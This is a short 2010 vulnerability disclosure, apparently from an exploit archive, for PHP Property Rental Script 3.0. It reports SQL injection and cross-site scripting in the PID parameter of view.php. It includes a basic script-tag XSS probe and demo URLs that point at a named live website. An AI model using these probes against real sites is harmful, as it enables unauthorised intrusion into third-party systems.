Home / os / win7

PHP Property Rental Script XSS/ SQL Injection Vulnerability

Posted on 09 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PHP Property Rental Script XSS/ SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===========================================================
PHP Property Rental Script XSS/ SQL Injection Vulnerability
===========================================================


Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:PHP Property Rental Script SQLi &amp; XSS Vulnerability
Version:3.0
Price:600$
Vendor url:http://www.zincksoft.com/
Published: 2010-06-09
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r and to all ICW members

#####################################################################################################################################################################################################

Description:

PHP Property Rental Script

PHP Property Rental Script is a wonderful solution to launch your own Property rental or sale website. Script has very good features to provide a very sound foundation to your rental portal site
. Script offers great earning potential. It is a Complete Script with quality features like:
1. Property profiles Rental Offers
2. Internal messaging
3. Google Map
4. FULLY customizable site colors and graphics
5. Script parameters are highly configurable through script admin panel.
6. Paypal Payment Gateway
7. Membership options
8.And of course great earning potential And lot more?
#######################################################################################################################################################################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL :http://www.propertylettingsnetwork.com/view.php?PID=[sqli]

*XSS Vulnerability
?
Pattern:'&quot;--&gt;&lt;script&gt;alert(0x000872)&lt;/script&gt;

DEMO URL :http://www.propertylettingsnetwork.com/view.php?PID=[XSS]

# 0day n0 m0re #


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :